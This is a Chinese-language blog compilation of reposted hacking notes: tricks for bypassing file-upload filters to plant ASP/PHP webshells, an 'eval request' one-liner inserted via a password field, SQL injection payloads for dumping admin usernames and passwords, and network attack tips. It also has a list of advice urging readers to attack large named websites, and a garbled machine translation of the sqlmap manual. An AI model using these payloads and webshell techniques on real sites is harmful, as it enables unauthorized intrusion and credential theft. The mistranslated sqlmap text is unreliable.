上傳漏洞總結(jié)

1、上傳漏洞總結(jié)(2013-11-10 15:11:13) 轉(zhuǎn)載分類： 那些事兒 1.直接上傳asp asa jsp cer php aspx htr cdx 格式的木馬，不行就利用IIS6.0解析漏洞”:1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls2.上傳圖片木馬遇到攔截系統(tǒng)，連圖片木馬都上傳不了，記事本打開圖片木馬在代碼最前面加上gif89a，一般就能逃過攔截系統(tǒng)了。3.上傳圖片木馬把地址復(fù)制到數(shù)據(jù)庫備份里備份成asp木馬，有時不成功就利用IIs6.0解析漏洞嘗試突破。4.上傳圖片木馬再用抓包工具進(jìn)行抓包，用明小子的綜合上傳功能，復(fù)制上傳地址及cook

2、ies填到對應(yīng)的框里，點擊上傳即可。 5.當(dāng)后臺有數(shù)據(jù)庫備份蛋沒有上傳點時，把一句話木馬插到任意處，再到數(shù)據(jù)庫備份里備份成asp木馬，之后用一句話客戶端連接木馬即可。 6.后臺點擊修改密碼，新密碼設(shè)置為：1:eval request(“h”)設(shè)置成功后連接asp/config.asp即可拿下shell7.當(dāng)頁面提示“上傳格式不正確重新上傳” 則說明存在上傳漏洞，復(fù)制地址放到明小子里上傳，一般都能直接拿下shell。8.當(dāng)后臺沒有數(shù)據(jù)庫備份但有數(shù)據(jù)庫恢復(fù)的情況下，請不要猶豫，數(shù)據(jù)庫恢復(fù)跟數(shù)據(jù)庫備份功能是一樣的，直接邪惡吧。9.如果知道網(wǎng)站的數(shù)據(jù)庫是asp的，直接在前臺找留言板插入一句話木馬，連接

3、配置文件inc/config.asp即可拿下shell。10.當(dāng)網(wǎng)站前臺有“會員注冊” 注冊一個賬戶進(jìn)去看看有沒有上傳點，有的話直接上傳asp木馬以及利用iis6.0解析漏洞，不行就抓包用明小子上傳。11.先上傳一個.ashx的文件，在筆記里搜索可找到方法，結(jié)果是訪問會生成一句話木馬文件，后臺上傳、編輯器上傳、上傳漏洞頁面均可使用此方法。12.當(dāng)頁面提示只能上傳jpg|gif|png等格式的時候，右鍵查看源文件，本地修改為asp|asa|php再本地上傳即可拿下shell。13.當(dāng)用啊D檢測注入點提示SA權(quán)限或DB權(quán)限的時候，嘗試列目錄找到網(wǎng)站物理路徑，再點擊cmd/上傳，直接上傳asp木馬即

4、可，不行就差異備份拿shell。14.對于一些上傳漏洞的上傳頁面，以及后臺找到的上傳頁面，可以嘗試用本地雙文件上傳突破，第一個選jpg第二個選cer，推薦使用火狐瀏覽器。詳解藍(lán)科CMS漏洞批量拿shall(2013-11-10 16:04:36) 轉(zhuǎn)載分類： 那些事兒 關(guān)鍵詞： inurl:recruitment/mail_job.asp漏洞頁面： admin/left.asp利用關(guān)鍵詞搜索一下，出來很多結(jié)果。隨便進(jìn)入一個網(wǎng)站后，在網(wǎng)站后面加上admin/left.asp直接進(jìn)入了后臺。首先要把瀏覽器的安全性設(shè)置一下點擊工具Internet選項 如下圖：添加一個用戶用戶添加完后再把瀏覽器的安全

5、性區(qū)域級別設(shè)置回來，設(shè)置為默認(rèn)就行了。刷新頁面后，會出來網(wǎng)站后臺登錄的地方，然后用剛才添加的用戶登錄進(jìn)去后，下面就開始拿shell了,拿shell方法很簡單直接用數(shù)據(jù)備份。分享： 0喜歡淺談ASP，PHP入侵那些事兒(2013-11-10 16:14:31) 轉(zhuǎn)載分類： 那些事兒 簡單判定有無漏洞：粗略型：1. 數(shù)字型：and 1=1 and 1=22.字符型： and 1=1 and 1=23.搜索型：% and 1=1 and %=% 或者 % and 1=2 and %=%（PS：第三個大家可能不常用，他一般在ASP腳本中一般寫成：keyword=request（”keyword”），賦

6、值“KYO”到SQL語句中的時候即變?yōu)镾elect * from 表名 where keyword like %KYO%）簡單判斷數(shù)據(jù)庫信息：語句型（IIS報不報錯，語句自己區(qū)分）：and user0and (select count(*) from msysobjects)0 （頁面錯誤為access數(shù)據(jù)庫）and (select count(*) from sysobjects)0 （頁面正常為MSSQL數(shù)據(jù)庫）and db_name（）0 (爆數(shù)據(jù)庫名)version0 (爆SQLServer版本信息以及服務(wù)器操作系統(tǒng)的類型和版本信息)粗略型：加 （根據(jù)服務(wù)器報錯的信息來判斷）加 ;（；

7、和MSSQL數(shù)據(jù)庫里面一般都有， ； 表示分離， 則是注釋符ACCESS數(shù)據(jù)庫里沒有）判斷MYSQL權(quán)限：and 0（Select ISSRVROLEMEMBER（sysadmin）（頁面正常則為SA）and 0（Select IS_MEMBER（db_owner）（頁面正常則為db_owner）and 0（Select IS_MEMBER（public）（頁面正常則是public）PS：以上方法適用于參數(shù)是int的時候，若為字符型，需在參數(shù)后添加和查詢語句后添加；開始進(jìn)行SQL注入(ACCESS)：猜解表名：and 0(select count(*) from 表名) 或and exists

8、（Select * from 表名）and 1N （TOP表示把最前面的一條記錄提取出來；N為變換猜解的列長度，頁面錯誤即說明該列長度為N）如：and 1=(select count(*) from user where len(name)6) 錯誤and 1=(select count(*) from user where len(name)5) 正確則長度是6猜解用戶名和密碼：and (select top 1 asc(mid(列名,1,1) from 表名)0如：and (select top 1 asc(mid(user,1,1) from name)96頁面正常and (select

9、 top 1 asc(mid(user,1,1) from name)97頁面錯誤則ASCLL碼為97PS：因為MD5的密文只有16,18,32,40這幾個，所以猜解密碼的時候只要試一試15,16,17,18,31,32,39,40等就簡單些。開始進(jìn)行SQL注入(MYSQL)：爆出表名和字段： having 1=1插入新記錄： group by users.ID having 1=1group by users.ID, users.username, users.password, users.privs having 1=1; insert into users values( 666, a

10、ttacker, foobar, 0xffff )猜解表名：and (select top 1 name from sysobjects where xtype=u)0 （獲得第一個表名）and (select top 1 name from sysobjects where xtype=u and name not in (user)0（獲得第二個表名）猜解列名：and (select top 1 col_name(object_id(字段),1) from sysobjects)0（得到字段的第一個列名）猜解字段內(nèi)容：and (select top 1 列名 from 表名)0如：and

11、(select top 1 username from admin)0 （獲取用戶名）and (select top 1 password from admin)0 （獲取密碼）導(dǎo)出webshell：1.利用SQL執(zhí)行命令功能導(dǎo)出WebShell:SELECT 分享： 0喜歡滲透筆記(2013-11-13 13:09:52) 轉(zhuǎn)載分類： 轉(zhuǎn)載 安全研究室的小編們帶來，主要為一些短小但又精華的滲透小技巧，這些技巧都是由小編們在平時讀書、學(xué)習(xí)的時候積累的一些小技巧，初定為每周更新一次。為保證質(zhì)量，每一篇為20條左右的滲透小記。同時歡迎其他同學(xué)們投稿給我們你的筆記與大家分享 1、避免0day攻擊的最

12、好辦法是實現(xiàn)啟發(fā)式（Heuristic）或基于輪廓（Profile-based）的入侵檢測系統(tǒng)。2、常見的安全證書包括CCIE: Security、CEH、CISSP、CCSP、GIAC、OPSTA和Security+。3、Nmap掃描主機(jī)開放端口，能夠在運行IPSec的OpenBSD 2.7 系統(tǒng)上引發(fā)DOS攻擊。當(dāng)使用-sO選項運行Nmap時，就會引起OpenBSD系統(tǒng)奔潰。4、現(xiàn)在已知端口掃描能夠在下述環(huán)境中引發(fā)DOS攻擊：Efficient Networks Routers、pcAnywhere9.0、安裝了Novell intraNetWare Client的Windows 95/9

13、8。5、濕件（Wetware），濕件就是計算機(jī)中人類的因素。6、被動偵查：用戶組會議、Web網(wǎng)站上的信息、Edgars數(shù)據(jù)庫、社工庫、UUNet新聞組、商業(yè)伙伴、垃圾搜索、社會工程學(xué);主動偵查：端口掃描、DNS查詢、區(qū)域傳輸、ping掃描、路由跟蹤、OS特征檢測7、端口掃描的幾種類型：TCP Connect（）掃描、SYN掃描、NULL掃描、FIN掃描、ACK掃描、Xmas-Tree掃描、Dumb掃描、Reverse Ident掃描8、灰箱測試（Gray-Box）：測試人員模擬內(nèi)部雇員。他們得到了一個內(nèi)部網(wǎng)絡(luò)的賬號，并且擁有了訪問網(wǎng)絡(luò)的標(biāo)準(zhǔn)方法。這項測試用于評估來自企業(yè)內(nèi)部職員的攻擊。9、在n

14、etcat中，經(jīng)常使用53端口監(jiān)聽的原因是：這個端口號是分配跟DNS使用的，通常防火墻開放這個端口。如果選擇其他不常用的端口，那么防火墻可能會阻斷這些端口的流量。10、盲注的核心語句： 1php?id=1 and (select ord(mid(group_concat(SCHEMA_NAME),20,1) from information_schema.schemata)011、VLAN 跳躍攻擊利用了DTP。在VLAN跳躍中，將我們的計算機(jī)偽裝為另一個交換機(jī)。我們發(fā)送一條偽造的DTP協(xié)商消息，聲明我們希望進(jìn)行幀中繼。當(dāng)真實交換機(jī)接到我們的DTP消息之后，它就會認(rèn)為它應(yīng)該轉(zhuǎn)到802.1Q中繼

15、。當(dāng)轉(zhuǎn)入中繼狀態(tài)之后，發(fā)自所有VLAN的所有流量都發(fā)送到你的計算機(jī)上。12、VTP攻擊：在被攻擊網(wǎng)絡(luò)上連接一臺交換機(jī)，然后在新增交換機(jī)和黑客的計算機(jī)之間建立中繼連接。之后，惡意黑客向交換機(jī)發(fā)送一條VTP消息，該消息的配置修訂號大于當(dāng)前VTP服務(wù)器上的配置修訂號，但不配置VLAN。這樣，所有的交換機(jī)都與惡意黑客的計算機(jī)進(jìn)行同步，從而在他們的VLAN數(shù)據(jù)庫中刪除所有非默認(rèn)的VLAN（當(dāng)然，你要撞對VTP password。）13、 在ACK掃描中，TCP數(shù)據(jù)包被發(fā)送到每一個端口，數(shù)據(jù)包設(shè)置了ACK位。防火墻通常會對未過濾的端口作出響應(yīng)，他的響應(yīng)是一個設(shè)置了RST位的TCP數(shù)據(jù)包。絕大多數(shù)的防火墻對

16、過濾掉的端口不作出響應(yīng)。通過記錄從防火墻返回的RST數(shù)據(jù)包，我們就可以評估運行在防火墻后面網(wǎng)絡(luò)中的服務(wù)是什么服務(wù)。14、如果防火墻開放ICMP端口（可ping、traceroute），可以利用Loki ICMP隧道技術(shù)來穿透，這種類型的隧道技術(shù)讓我們能夠在ICMP Echo數(shù)據(jù)包的數(shù)據(jù)部分承載一個后門應(yīng)用。15、ICMP隧道、ACK隧道和HTTP隧道穿透技術(shù)是三種穿越防火墻而不被檢測到的技術(shù)。16、規(guī)避基于特征類型的IDS，常用的兩種方法是：加密和利用轉(zhuǎn)換（Exploit Mutation）。其中加密通信我們可以利用NetCat的一個加密版本NCrypt來實現(xiàn)。17、惡意黑客通過向路由器發(fā)送大

17、量的CDP幀，能夠摧毀或重啟運行版本早于12.2（3）的Cisco IOS Software的路由器。要發(fā)送多個CDP幀，可以利用基于Linux的CDP Sender工具。18、思科路由器的兩種使能模式加密命令：enable password 【密碼】 和 enable secret 【密碼】，區(qū)別在于：在第一種加密中，口令以明文的形式存儲在配置中。通過在全局配置提示符下輸入命令service password-encryption，可以使用類型7加密方式加密口令。在第二種加密中，口令使用類型5加密方法進(jìn)行加密。19、Boson RIP Route Generator 可以模擬網(wǎng)絡(luò)上的路由器，

18、并讓我們能夠注入偽造網(wǎng)絡(luò)和配置的跳計數(shù)，以實現(xiàn)路由器注入技術(shù)（可以實現(xiàn)路由欺騙技術(shù)）。分享： 0喜歡必須記住的經(jīng)驗（出自凡叔）(2013-11-13 16:51:59) 轉(zhuǎn)載分類： 那些事兒 1、不要相信工具，啊D、明小子、ZBSI，在我前邊的課程演示中都出過錯，所以，工具是死的，人是活的，不要過于相信工具，也不要過于依賴工具。2、思路不要太死板，想到什么就去試試，你會有意想不到的收獲不要看到大網(wǎng)站就不敢下手，我前邊搞了21cn，搞了人民網(wǎng)，搞了12321，都是大網(wǎng)站，它們也是有可能存在注入的，所以不要不敢下手。3、在開始對一個網(wǎng)站檢測之前，先找找后臺在哪，如果實在找不到后臺，那建議放棄，如果

19、找到了后臺，那就先試試弱口令，有相當(dāng)一部分的網(wǎng)站后臺具有弱口令，如果沒有弱口令，那再從前臺下手也不遲，記住，弱口令永遠(yuǎn)是你通往后臺的最迅速的辦法。4、如果實在找不到后臺，不妨試試robots.txt和google hack，雖然成功的幾率不大，但是有勝于無。5、如果你猜到了表名后猜不到字段名，那么不妨去看看后臺登錄界面的源碼，一般登錄框的name值就是數(shù)據(jù)庫中的字段名，如：.hk/admin/index.php它的源碼片段如下：登入名稱:密碼:而在上一節(jié)課的實戰(zhàn)中，我們最終查出的字段就是這兩個字段。6、如果實在拿不到管理員的用戶名和密碼，不妨試試直接訪問后臺

20、頁面，具體的例子你可以看看這里：7、如果主站實在拿不下，那就旁注吧。8、不同的DNS服務(wù)器，查出的同IP的網(wǎng)站數(shù)量是不一樣的，一般的，這個網(wǎng)站查出的比較全面：9、如果不是有特殊原因，最好不要給人掛黑頁，那是一種不道德的行為，大多數(shù)時候，在留個html或者txt上去，證明你來過，就行了。10、如果你進(jìn)到了后臺，但是無法拿到webshell，那就截個圖留念一下就好了，不要利用后臺的權(quán)限去修改、刪除別人的新聞，那只能說明你的無知，如果你真的修改了，最好不要在新聞里寫上你的名字，否則同行看到了會笑話你的。11、編輯器永遠(yuǎn)是你通往webshell的最好用的路徑。12、不要只看動畫教程而對文章不屑一顧，拿

21、站這種事，在動畫里是說不清楚的，而文章卻能把它說的清清楚楚的。13、你要有耐心，我見過一個頁面80多個字段的，那就得一個一個的猜，比如：.hk/news_detail.php?id=164這個頁面的數(shù)據(jù)庫里，一共有34個表段，我查表就查了34次。不要厭煩，要有耐心。14、注重實踐，經(jīng)驗在拿站這方面很重要。15、你最好學(xué)學(xué)腳本，HTML永遠(yuǎn)都是基礎(chǔ)，VBS是輔助，JAVASCRIPT需要熟悉，ASP、PHP、JSP，這3樣必須得會一樣。16、不要怕難，想學(xué)就去學(xué)吧，慢慢的你就會了。17、我教你的這些，在拿站界只是皮毛，千萬不要妄自尊大，你我需要學(xué)習(xí)的都還有很多

22、，多看看別人的檢測過程，我們是總能學(xué)到東西的。18、多實戰(zhàn)、多總結(jié)、多讀書。完畢。分享： 0喜歡ashx腳本寫入腳本文件拿webshell(2013-11-15 23:39:57) 轉(zhuǎn)載分類： 那些事兒 如果后臺過濾了asa,cer,cdx,php,aspx等腳本類型的上傳情況下添加一個ashx的上傳類型，上傳一個ashx腳本上去，腳本內(nèi)容如下：分享： 0喜歡SQLMAP注射工具用法(2013-11-21 13:22:33) 轉(zhuǎn)載分類： 那些事兒 SQLMAP 注射工具用法SQLMAP注射工具用法1。介紹1.1要求1.2網(wǎng)應(yīng)用情節(jié)1.3SQL射入技術(shù)1.4特點1.5下載和更新sqlmap1.6

23、執(zhí)照2。用法2.1幫助2.2目標(biāo)URL2.3目標(biāo)URL和verbosity2.4URL參量2.5Googledork2.6HTTP方法:得到或張貼2.7張貼的數(shù)據(jù)串2.8HTTP曲奇餅倒栽跳水2.9HTTP用戶代理倒栽跳水2.10任意HTTP用戶代理倒栽跳水2.11HTTP認(rèn)證2.12HTTP代理人2.13串比賽2.14遙遠(yuǎn)的數(shù)據(jù)庫管理系統(tǒng)2.15廣泛的DBMS指印2.16橫幅2.17當(dāng)前的用戶2.18當(dāng)前的數(shù)據(jù)庫2.19數(shù)據(jù)庫用戶2.20數(shù)據(jù)庫用戶密碼hashes2.21可利用的數(shù)據(jù)庫2.22數(shù)據(jù)庫桌2.23數(shù)據(jù)庫桌專欄2.24轉(zhuǎn)儲數(shù)據(jù)庫制表詞條2.25轉(zhuǎn)儲整個DBMS2.26檢索文件內(nèi)容2

24、.27處理您自己的表示2.28檢查聯(lián)合詢問SQL射入2.29利用聯(lián)合詢問SQL射入2.30估計的到達(dá)時間2.31之外所有數(shù)據(jù)被檢索在文本文件2.32簡歷詢問價值從文本文件3。參考4。接觸-1。介紹sqlmap是一個自動SQL射入工具。它是可勝任執(zhí)行一個廣泛的數(shù)據(jù)庫管理系統(tǒng)后端指印,檢索遙遠(yuǎn)的DBMS數(shù)據(jù)庫,usernames,桌,專欄,列舉整個DBMS,讀了系統(tǒng)文件和利用導(dǎo)致SQL射入弱點的網(wǎng)應(yīng)用編程的安全漏洞。有許多其它SQL射入工具在網(wǎng),但我不能發(fā)現(xiàn)任何人適合所有我的需要因此我感到需要在我的滲透測試期間給成功地寫我自己的工具測試,辨認(rèn)和利用網(wǎng)應(yīng)用的SQL射入在安全上的弱點。1.1要求sql

25、map整個地被開發(fā)在Python,一個動態(tài)面向?qū)ο蟮谋唤忉尩木幊陶Z言。這由操作系統(tǒng)使工具獨立。sqlmap實際上依靠只自由地是下載的從它的正式站點的Python口譯員。做它更加容易,許多GNU/Linux發(fā)行從箱子出來以Python包裹preinstalled并且其它 Unices提供這個解釋語言precompiled入他們的包裹格式。如果您使用窗口或MacOSx那里存在precompiled設(shè)定準(zhǔn)備好正式可執(zhí)行在Python站點。1.2網(wǎng)應(yīng)用情節(jié)我們說您驗核網(wǎng)應(yīng)用的安全并且您發(fā)現(xiàn)了接受動態(tài)用戶提供價值對它得到并且/或者張貼參量的一個網(wǎng)頁。您現(xiàn)在想要測試如果這些是脆弱的對SQL射入弱點,如果那

26、樣,剝削他們檢索同樣多信息盡可能在網(wǎng)應(yīng)用的數(shù)據(jù)庫管理系統(tǒng)外面甚至能讀任意文件從數(shù)據(jù)庫管理系統(tǒng)計算機(jī)如果網(wǎng)頁是:7/page.php?id=1&cat=2假定:7/page.php?id=1+AND+1=1&cat=2和原始一個一樣是頁和:7/page.php?id=1+AND+1=2&cat=2與它意味的原始的產(chǎn)品不同我們是在一個SQL射入弱點前面在id意味網(wǎng)應(yīng)用index.php頁的得到參量IDS/IPS,沒有網(wǎng)應(yīng)用防火墻,沒有參數(shù)值sanitization不執(zhí)行在服務(wù)器邊亦不PHP口譯員邊

27、。這是相當(dāng)共同的缺點在動態(tài)美滿的網(wǎng)應(yīng)用并且它不取決于遙遠(yuǎn)的DBMS或在網(wǎng)應(yīng)用語言,這是程序員代碼的安全漏洞。開放網(wǎng)應(yīng)用安全項目最近對在他們的OWASP名列前茅十這個弱點估計作為最共同和最重要的網(wǎng)應(yīng)用弱點,其次唯一十字架站點Scripting問題?；氐角楣?jié),statemenetSELECT入大概index.php有句法相似與以下SQL詢問在冒充的PHP:$query=SELECTFROMWHEREid=.$_REQUESTid;如此,如同您能看,添附其他syntatically合法的SQL情況在a(之后合法的)價值為id這樣的情況將發(fā)生當(dāng)網(wǎng)應(yīng)用執(zhí)行詢問在附上DBMS,所以情況id=1AND1=1

28、和原物一樣是合法的(真實)并且退回頁,以同樣內(nèi)容和沒有任一個古怪的SQL錯誤信息。更多,在這個例子它會是還可能添附,不僅一個或更多合法的SQLcondition(s),而且其他完全SQL詢問,請求某事象在偽碼id=1;ANOTHERSQLQUERY-即然我們發(fā)現(xiàn)了這個SQL射入脆弱的參量,我們能利用它操作id參數(shù)值。通過原始的地址,7/page.php?id=1&cat=2對 sqlmap,工具自動地將辨認(rèn)脆弱的參量(id在這個情節(jié))并且將添附syntatically合法的SQL聲明串包含SELECT次級聲明或我們想要檢索產(chǎn)品的其他聲明。由做比較根據(jù)超文字標(biāo)記

29、語言頁hashes,串或每被請求的頁與原始一個,sqlmap正則表達(dá)式比賽確定聲明字符的產(chǎn)品價值將由字符,這個技術(shù)作為盲目的SQL射入的名字和很好被描述在許多文件里,檢查參考部分有些技術(shù)文章。1.3SQL射入技術(shù)與二等分算法被實施在sqlmap執(zhí)行這攻擊以盲目的SQL射入著名這達(dá)到以大約七個HTTP請求每產(chǎn)品的各個字符,但如果網(wǎng)應(yīng)用頁代碼解析聲明的產(chǎn)品SELECT入afor或相似的周期以便詢問產(chǎn)品的各條線打印在頁內(nèi)容,我們是在一個inbandSQL射入弱點,亦稱聯(lián)合詢問SQL射入弱點前面。我強(qiáng)烈勸告您跑至少一旦sqlmap以-union-check命令行選擇到測試如此和如果用途-union-

30、use命令行選擇利用這個弱點因為它保存得很多時間并且它不衡量在網(wǎng)絡(luò)服務(wù)器記錄文件下以上百HTTP請求。1.4特點這主要特點名單被實施在sqlmap:完全支持為MySQL、Oracle、PostgreSQL和微軟SQL服務(wù)器數(shù)據(jù)庫管理系統(tǒng)后端。除這些四以外DBMS,sqlmap可能并且辨認(rèn)微軟通入、DB2、Informix和Sybase;廣泛的數(shù)據(jù)庫管理系統(tǒng)后端指印根據(jù):InbandDBMS錯誤信息DBMS橫幅解析DBMS起作用產(chǎn)品比較DBMS具體特點譬如MySQL評論射入被動SQL射入fuzzing它充分支持二個SQL射入技術(shù):盲目的SQL射入,亦稱推斷SQL射入InbandSQL射入,亦稱聯(lián)

31、合詢問SQL射入并且它部份地支持錯誤基于的SQL射入作為傳染媒介的當(dāng)中一個為數(shù)據(jù)庫管理系統(tǒng)指印;它自動地測試所有被提供得到,張貼,曲奇餅和用戶代理參量發(fā)現(xiàn)動態(tài)那些。在這些它測試和自動地查出那個通過SQL射入影響。而且各個動態(tài)參量被測試為數(shù)字,選拔引證串,加倍引證串和所有這些三型以一個和二個托架發(fā)現(xiàn)哪些是合法的句法進(jìn)行進(jìn)一步射入與;它是可能提供唯一的parameter(s)的名字,您想要執(zhí)行測試并且用途為射入,是他們得到,張貼,曲奇餅參量;SQL射入測試和偵查不取決于網(wǎng)應(yīng)用數(shù)據(jù)庫管理系統(tǒng)后端。SQL射入剝削和詢問句法明顯地取決于網(wǎng)應(yīng)用數(shù)據(jù)庫管理系統(tǒng)后端;它認(rèn)可合法的詢問由假那些根據(jù)HTML產(chǎn)品頁

32、hashes比較,但它是還可能選擇執(zhí)行這樣的測試根據(jù)串匹配;HTTP請求可能執(zhí)行在HTTP方法GET和POST(缺省:GET);它是可能執(zhí)行HTTP請求使用HTTPUser-Agent倒栽跳水串從文本文件任意地被挑選;它是可能提供HTTPCookie倒栽跳水串,有用當(dāng)網(wǎng)應(yīng)用要求認(rèn)證根據(jù)曲奇餅并且您有這樣數(shù)據(jù);它是可能提供一個匿名HTTP代理人地址和口岸對通行證由HTTP請求對目標(biāo)URL;它是可能提供遙遠(yuǎn)的DBMS后端如果您已經(jīng)知道它做sqlmap之外某個時候指印它;它支持各種各樣的命令行選擇得到數(shù)據(jù)庫管理系統(tǒng)橫幅,當(dāng)前的DBMS用戶,當(dāng)前的DBMS數(shù)據(jù)庫,列舉用戶,密碼hashes的用戶,數(shù)據(jù)

33、庫,桌,專欄,轉(zhuǎn)儲制表詞條,傾銷整個DBMS,檢索一個任意文件內(nèi)容(如果遙遠(yuǎn)的DBMS是MySQL)并且提供您自己的SQL精選的聲明被評估;它是可能自動地做sqlmap查出如果受影響的參量通過聯(lián)合詢問SQL射入并且影響并且,在這樣的案件,使用它利用弱點;它是可能排除系統(tǒng)數(shù)據(jù)庫當(dāng)列舉桌,有用當(dāng)傾銷整個DBMS數(shù)據(jù)庫桌詞條并且您想要跳缺省DBMS數(shù)據(jù);它是可能觀看估計的到達(dá)時間為各詢問產(chǎn)品,被更新在實時當(dāng)進(jìn)行SQL射入攻擊;支持增加產(chǎn)品消息的verbosity水平;它是可能保存詢問執(zhí)行和他們的被檢索的價值在實時在產(chǎn)品文本文件和繼續(xù)射入恢復(fù)從這樣的文件在第二次;PHP設(shè)置magic_quotes_g

34、pc旁路由輸入每詢問串,在單引號之間,以CHAR(或相似)DBMS具體作用。1.5下載和更新sqlmap這個指南是sqlmap的一部分。您應(yīng)該接受了它當(dāng)您下載了sqlmap。sqlmap可能被下載從它的SourceForge文件名單頁和發(fā)展發(fā)行從可能沖浪以瀏覽器或被獲取對下載sqlmap的它的SourceForge顛覆貯藏庫:$svncheckoutsqlmap任何方式您下載了sqlmap,奔跑svnupdate在它的根目錄(有主文件的地方sqlmap.py)與SVN貯藏庫同步檢索它的原始代碼更新在您運作的拷貝保證,您跑節(jié)目的最新的版本。關(guān)于SourceForge顛覆貯藏庫用法的詳細(xì)信息可能被

35、發(fā)現(xiàn)這里。1.6執(zhí)照sqlmap被發(fā)布在公眾執(zhí)照v2條件下。2。用法唯一的二個可能的必須的參量是:-u或-url:選拔目標(biāo)URL測試,查出和注射對于SQL射入缺點-g:測試所有Google結(jié)果尋找一位具體Googledork這些是唯一的二命令行參量排除eachother。跟隨sqlmap命令行參量和價值被解釋在細(xì)節(jié)以一個例子為各個參量。2.1幫助$pythonsqlmap.py-hsqlmap/X.YcodedbyinquisandbelchUsage:sqlmap.pyoptions-u|-gOptions:-h,-helpshowthishelpmessageandexit-uURL,-u

36、rl=URLtargeturl-pTESTPARAMETERspecifythetestableparameter(s)-gGOOGLEDORKratherthanprovidingatargeturl,letGooglereturntargethostsasresultofyourGoogledorkexpression-method=HTTPMETHODHTTPmethod,GETorPOST(default:GET)-data=DATAdatastringtobesentthroughPOST-cookie=COOKIEHTTPCookieheader-user-agent=UAGENT

37、HTTPUser-Agentheader-aUSERAGENTSFILEloadarandomHTTPUser-Agentheaderfromfile-basic-auth=BAUTHHTTPBasicAuthentication,value:username:password-digest-auth=DAUTHHTTPDigestAuthentication,value:username:password-proxy=PROXYuseaproxytoconnecttothetargeturl-string=STRINGstringtomatchinpagewhenthequeryisvali

38、d-remote-dbms=DBMSperformchecksonlyforthisspecificDBMS-f,-fingerprintperformanexaustivedatabasefingerprint-b,-bannergetDBMSbanner-current-usergetcurrentDBMSuser-current-dbgetcurrentDBMSname-usersgetDBMSusers-passwordsgetDBMSuserspasswordhashes-dbsgetavailabledatabases-tablesgetdatabasetables(optiona

39、l:-D)-columnsgettablecolumns(required:-Tand-D)-dumpdumpdatabasetableentries(required:-Tand-Doptional:-C)-dump-alldumpalldatabasestablesentries-file=FILENAMEreadaspecificfilecontent-eEXPRESSIONexpressiontoevaluate-union-checkcheckforUNIONSELECTstatement-union-useusetheUNIONSELECTstatementtoretrieveth

40、equeriesoutput-DDB,-database=DBdatabasetoenumerate-TTBL,-table=TBLdatabasetabletoenumerate-CCOL,-column=COLdatabasetablecolumntoenumerate-exclude-sysdbsexcludesystemdatabaseswhenenumeratingtables-etaretrieveeachquerylengthandcalculatetheestimatedtimeofarrival-vVERBOSEsetverbositylevel(0-2),defaultis

41、0-oOUTPUTFILEsavealldataretrievedonatextfile-r,-resumeresumequeriesvaluefromatextfile2.2目標(biāo)URL命令行選擇:-u或-url跑sqlmap在唯一目標(biāo)URL:$pythonsqlmap.py-u7/page.php?id=1&cat=2remoteDBMS:MySQL=5.0.02.3目標(biāo)URL和verbosity命令行選擇:-v絮絮叨叨的選擇可能使用設(shè)置產(chǎn)品消息的verbosity水平。它的價值可能實際上是0,1或2。它的價值是0因為sqlmap不會打印任何新聞消息對標(biāo)準(zhǔn)產(chǎn)

42、品,只有詢問產(chǎn)品和最后警告和錯誤如果他們發(fā)生。$pythonsqlmap.py-u7/page.php?id=1&cat=2-v1hh:mm:25INFOtestingiftheurlisstable,waitafewsecondshh:mm:26INFOurlisstablehh:mm:26INFOtestingifGETparameteridisdynamichh:mm:26INFOconfirmingthatGETparameteridisdynamichh:mm:26INFOGETparameteridisdynamichh:mm:26INFOtest

43、ingsqlinjectiononGETparameteridhh:mm:26INFOtestingnumeric/dinjectiononGETparameteridhh:mm:26INFOconfirmingnumeric/dinjectiononGETparameteridhh:mm:26INFOGETparameteridisnumeric/dinjectablehh:mm:26INFOtestingMySQLhh:mm:26INFOquery:CONCAT(5,5)hh:mm:26INFOretrieved:55hh:mm:26INFOperformed20queriesin0sec

44、ondshh:mm:26INFOconfirmingMySQLhh:mm:26INFOquery:LENGTH(5)hh:mm:26INFOretrieved:1hh:mm:26INFOperformed13queriesin0secondshh:mm:26INFOquery:SELECT5FROMinformation_schema.TABLESLIMIT0,1hh:mm:26INFOretrieved:5hh:mm:26INFOperformed13queriesin0secondsremoteDBMS:MySQL=5.0.02.4URL參量命令行選擇:-psqlmap測試全部得到并且崗位

45、為dynamicity和SQL射入弱點提供了參量,但它手工是可能的對specificy您要sqlmap執(zhí)行對逗號的測試separeted為了未參加dynamicity測試和執(zhí)行SQL射入測試的URLparameter(s),偵查和剝削只在被提供的 parameter(s):$pythonsqlmap.py-u7/page.php?id=1&cat=2-v1-pidhh:mm:17INFOtestingiftheurlisstable,waitafewsecondshh:mm:18INFOurlisstablehh:mm:18INFOtestingsqlinje

46、ctiononparameteridhh:mm:18INFOtestingnumeric/dinjectiononparameteridhh:mm:18INFOconfirmingnumeric/dinjectiononparameteridhh:mm:18INFOparameteridisnumeric/dinjectable.或如果您想要提供超過一個參量,例如:$pythonsqlmap.py-u7/page.php?id=1&cat=2-v1-pcat,id2.5Googledork命令行選擇:-g而不是提供目標(biāo)URL它是還可能執(zhí)行對參量的測試在地址由G

47、oogledork查尋返回。這個選擇做sqlmap與搜索引擎談判它的會議曲奇餅?zāi)軋?zhí)行查尋,那么sqlmap將檢索Google第一個100個結(jié)果為表示與得到參量問您的Googledork如果您想要測試和得到SQL射入好處在各可能的受影響的URL。$pythonsqlmap.py-gsite:inurl:example.php-v1hh:mm:38INFOfirstrequesttoGoogletogetthesessioncookiehh:mm:39INFOsqlmapgotPREF=ID=xxxxxxxxxxxxxxxx:TM=yyyyyyyyyy:LM=zzzzzzzzzz:S=wwwwwwwwwwwwwwwwassessioncookiehh:mm:40INFOsqlmapgot65resultsforyourGoogledorkexpression,59ofthemaretestablehostshh:mm:40INFOurl1:hh:mm:43INFOurl3:hh:mm:42INFOurl2:hh:mm:44INFOtestingurlhh:mm:45INFOtestingiftheurlisstable,waitafewsecondshh:mm:49INFOurl